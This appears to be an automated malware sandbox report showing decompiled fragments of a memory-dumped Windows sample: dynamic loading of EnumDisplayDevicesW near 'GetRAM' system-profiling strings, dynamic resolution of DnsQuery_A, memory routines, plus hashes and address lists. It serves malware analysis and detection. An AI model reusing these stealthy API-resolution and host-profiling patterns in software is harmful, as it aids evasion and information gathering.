                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00416696
                                                                                                                                                                                              0x00416697
                                                                                                                                                                                              0x004166aa
                                                                                                                                                                                              0x004166bb
                                                                                                                                                                                              0x004166c0
                                                                                                                                                                                              0x004166c6
                                                                                                                                                                                              0x004166d2
                                                                                                                                                                                              0x004166d2
                                                                                                                                                                                              0x004166eb
                                                                                                                                                                                              0x004166ee
                                                                                                                                                                                              0x004166f1
                                                                                                                                                                                              0x004166fc
                                                                                                                                                                                              0x0041670c

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(user32.dll,EnumDisplayDevicesW,00000000,0041670D,?,-00000001,0041B0FC,?,?,00416863,Video Info,?,004169AC,?,GetRAM: ,?), ref: 00416678
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0041667E
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                                              • String ID: EnumDisplayDevicesW$user32.dll
                                                                                                                                                                                              • API String ID: 2574300362-1693391355
                                                                                                                                                                                              • Opcode ID: be31b090cf9e22f53fe63a2b9ccc94bb75e49f076f039a93db071de62ba29d85
                                                                                                                                                                                              • Instruction ID: bffb8a391e8cbf63d1c0eded9315efc20e69fe0ee1e689c0aa8ff6c2638661ea
                                                                                                                                                                                              • Opcode Fuzzy Hash: be31b090cf9e22f53fe63a2b9ccc94bb75e49f076f039a93db071de62ba29d85
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E118970500618AFDB61EF61CC45BDABBBCEF84709F1140FAE508A6291D6789E848E58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00417E80, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 29%
                                                                                                                                                                                              			E00417E80(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr* _t34;
				intOrPtr _t38;
				intOrPtr* _t43;
				void* _t46;

				_v12 = __edx;
				_v8 = __eax;
				E00403980(_v8);
				_push(_t46);
				_push(0x417f22);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffff4;
				_t43 = GetProcAddress(LoadLibraryA("dnsapi.dll"), "DnsQuery_A");
				if(_t43 != 0) {
					_v16 = 0;
					_t34 = E00402530(0x30);
					_v16 = E00402530(0x48);
					 *_t34 = 1;
					 *((intOrPtr*)(_t34 + 4)) = _v12;
					_push(0);
					_push( &_v16);
					_push(_t34);
					_push(0);
					_push(1);
					_push(E00403990(_v8));
					if( *_t43() == 0) {
					}
				}
				_pop(_t38);
				 *[fs:eax] = _t38;
				_push(E00417F29);
				return E004034E4( &_v8);
			}










                                                                                                                                                                                              0x00417e89
                                                                                                                                                                                              0x00417e8c
                                                                                                                                                                                              0x00417e92
                                                                                                                                                                                              0x00417e99
                                                                                                                                                                                              0x00417e9a
                                                                                                                                                                                              0x00417e9f
                                                                                                                                                                                              0x00417ea2
                                                                                                                                                                                              0x00417ebc
                                                                                                                                                                                              0x00417ec0
                                                                                                                                                                                              0x00417ec4
                                                                                                                                                                                              0x00417ed1
                                                                                                                                                                                              0x00417edd
                                                                                                                                                                                              0x00417ee0
                                                                                                                                                                                              0x00417ee9
                                                                                                                                                                                              0x00417eec
                                                                                                                                                                                              0x00417ef1
                                                                                                                                                                                              0x00417ef2
                                                                                                                                                                                              0x00417ef3
                                                                                                                                                                                              0x00417ef5
                                                                                                                                                                                              0x00417eff
                                                                                                                                                                                              0x00417f04
                                                                                                                                                                                              0x00417f04
                                                                                                                                                                                              0x00417f04
                                                                                                                                                                                              0x00417f0e
                                                                                                                                                                                              0x00417f11
                                                                                                                                                                                              0x00417f14
                                                                                                                                                                                              0x00417f21

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB1
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 00417EB7
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                                              • String ID: DnsQuery_A$dnsapi.dll
                                                                                                                                                                                              • API String ID: 2574300362-3847274415
                                                                                                                                                                                              • Opcode ID: a19d4597b475aaa9ac328eaf6b87c7589b0a3e1b2296b7586c6c4fb46158065e
                                                                                                                                                                                              • Instruction ID: 92d1eb556667ed81b8552bf9075b82756b3340621e6324b7cba7be93811987cb
                                                                                                                                                                                              • Opcode Fuzzy Hash: a19d4597b475aaa9ac328eaf6b87c7589b0a3e1b2296b7586c6c4fb46158065e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 20111CB1A04304AED751DBAACD42B9FBBF8EB48714F5140B6F904E73C1E678DE418A58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0040246C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 71%
                                                                                                                                                                                              			E0040246C(intOrPtr __eax, void* __edx) {
				intOrPtr _v8;
				void* __ecx;
				void* __ebp;
				intOrPtr _t25;
				intOrPtr _t36;
				intOrPtr _t39;
				void* _t42;
				intOrPtr _t45;
				intOrPtr _t47;

				_t45 = _t47;
				_t42 = __edx;
				_t25 = __eax;
				if( *0x41c5ac != 0 || E00401870() != 0) {
					_push(_t45);
					_push("�^");
					_push( *[fs:edx]);
					 *[fs:edx] = _t47;
					if( *0x41c035 != 0) {
						_push(0x41c5b4);
						L004011CC();
					}
					if(E00402290(_t25, _t42) == 0) {
						_t39 = E00401F5C(_t42);
						_t15 = ( *(_t25 - 4) & 0x7ffffffc) - 4;
						if(_t42 < ( *(_t25 - 4) & 0x7ffffffc) - 4) {
							_t15 = _t42;
						}
						if(_t39 != 0) {
							E00402628(_t25, _t15, _t39);
							E004020EC(_t25);
						}
						_v8 = _t39;
					} else {
						_v8 = _t25;
					}
					_pop(_t36);
					 *[fs:eax] = _t36;
					_push(E00402524);
					if( *0x41c035 != 0) {
						_push(0x41c5b4);
						L004011D4();
						return 0;
					}
					return 0;
				} else {
					_v8 = 0;
					return _v8;
				}
			}












                                                                                                                                                                                              0x0040246d
                                                                                                                                                                                              0x00402473
                                                                                                                                                                                              0x00402475
                                                                                                                                                                                              0x0040247e
                                                                                                                                                                                              0x00402495
                                                                                                                                                                                              0x00402496
                                                                                                                                                                                              0x0040249b
                                                                                                                                                                                              0x0040249e
                                                                                                                                                                                              0x004024a8
                                                                                                                                                                                              0x004024aa
                                                                                                                                                                                              0x004024af
                                                                                                                                                                                              0x004024af
                                                                                                                                                                                              0x004024bf
                                                                                                                                                                                              0x004024cd
                                                                                                                                                                                              0x004024db
                                                                                                                                                                                              0x004024e0
                                                                                                                                                                                              0x004024e2
                                                                                                                                                                                              0x004024e2
                                                                                                                                                                                              0x004024e6
                                                                                                                                                                                              0x004024ed
                                                                                                                                                                                              0x004024f4
                                                                                                                                                                                              0x004024f4
                                                                                                                                                                                              0x004024f9
                                                                                                                                                                                              0x004024c1
                                                                                                                                                                                              0x004024c1
                                                                                                                                                                                              0x004024c1
                                                                                                                                                                                              0x004024fe
                                                                                                                                                                                              0x00402501
                                                                                                                                                                                              0x00402504
                                                                                                                                                                                              0x00402510
                                                                                                                                                                                              0x00402512
                                                                                                                                                                                              0x00402517
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00402517
                                                                                                                                                                                              0x0040251c
                                                                                                                                                                                              0x00402489
                                                                                                                                                                                              0x0040248b
                                                                                                                                                                                              0x0040252c
                                                                                                                                                                                              0x0040252c

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,^), ref: 004024AF
                                                                                                                                                                                              • RtlLeaveCriticalSection.KERNEL32(0041C5B4,00402524), ref: 00402517
                                                                                                                                                                                                • Part of subcall function 00401870: RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
                                                                                                                                                                                                • Part of subcall function 00401870: RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
                                                                                                                                                                                                • Part of subcall function 00401870: LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
                                                                                                                                                                                                • Part of subcall function 00401870: RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                                                                                                              • String ID: ^
                                                                                                                                                                                              • API String ID: 2227675388-551292248
                                                                                                                                                                                              • Opcode ID: eac761777844288f10562a69e6fe07890201df0bfc717e3aee39787a8c1195b3
                                                                                                                                                                                              • Instruction ID: 4ed45a5183fb1a6edd108f9af425bfacc088641811e0c18f6da98f6ec62fa594
                                                                                                                                                                                              • Opcode Fuzzy Hash: eac761777844288f10562a69e6fe07890201df0bfc717e3aee39787a8c1195b3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 92113431700210AEEB25AB7A5F49B5A7BD59786358F20407FF404F32D2D6BD9C00825C
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%